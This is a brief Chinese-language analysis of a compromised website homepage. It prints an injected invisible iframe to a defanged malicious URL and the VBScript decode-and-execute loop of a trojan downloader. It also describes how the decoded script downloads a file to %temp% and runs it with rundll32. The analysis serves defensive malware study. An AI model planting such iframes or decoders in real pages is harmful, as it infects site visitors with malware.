网站首页包含代码:
/--- <iframe src="hxxp://2007.ads***3721.com/0*2**0***1.htm" width="0" height="0"></iframe> ---/ hxxp://2007.ads***3721.com/0*2**0***1.htm Kaspersky 报为 Trojan-Downloader.VBS.Small.dv,其中包含VBScript程序,功能是解密变量a的值并执行。 相关代码为: /--- D="EXECUTE """"":C="&CHR(&H":N=")":DO WHILE LEN(a)>1:D=D&C&LEFT(a,2)&"-2"&N:b=a:a=MID(b,3):LOOP:execute D ---/
重复5次解密过程,得到一段VBScript程序,功能是利用 Microsoft.XMLHTTP 和
scrīpting.FileSystemObject 下载文件 boy.jpg,保存为 %temp%/h1.bmp,并利用Shell.Application 对象Q 的 ShellExecute 方法 运行:"rundll32.exe",%temp%/h1.bmp,"","open",0
